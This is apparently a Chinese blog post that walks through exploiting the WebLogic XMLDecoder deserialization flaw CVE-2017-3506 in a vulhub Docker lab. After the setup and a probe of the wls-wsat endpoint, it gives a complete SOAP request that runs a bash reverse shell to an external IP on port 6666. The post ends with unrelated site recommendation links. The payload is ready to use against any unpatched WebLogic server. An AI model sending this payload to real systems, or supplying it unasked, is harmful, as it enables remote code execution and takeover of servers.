webLogic反序列化漏洞CVE-2017-3506

1.环境搭建

cd vulhub-master/weblogic/weak_password

docker-compose up -d

2.判断wls-wsat组件是否存在

拼接/wls-wsat/CoordinatorPortType

查看页面是否有回显 有回显说明存在组件

3.在当前页面抓包 反弹shell

添加请求包内容

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

<soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java version="1.8.0_131" class="java.beans.XMLDecoder">

<object class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/47.121.211.205/6666 0&gt;&amp;1</string>

</void>

</array>

<void method="start"/></object>

</java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

</soapenv:Envelope>

成功反弹shell

相关推荐
一只叫煤球的猫11 分钟前
你真的会用 return 吗?—— 11个值得借鉴的 return 写法
java·后端·代码规范
颇有几分姿色38 分钟前
Spring Boot 读取配置文件的几种方式
java·spring boot·后端
爱编程的鱼40 分钟前
C# 枚举(Enum)声明与使用详解
java·windows·c#
人生导师yxc41 分钟前
Spring MVC
java·spring·mvc
曹牧1 小时前
Java 调用webservice接口输出xml自动转义
java·开发语言·javascript
字节王德发1 小时前
如何在SpringBoot中通过@Value注入Map和List并使用YAML配置?
java·maven·intellij-idea
@淡 定1 小时前
Spring Boot 的配置加载顺序
java·spring boot·后端
龙大大L1 小时前
第五章:5.3 ESP32物联网应用:阿里云IoT平台与腾讯云IoT平台的数据上传与远程控制
java·物联网·struts·esp32
s9123601011 小时前
rust REGEX和lazy_static 和struct 混用
java·前端·javascript
淬渊阁2 小时前
Go package
java·开发语言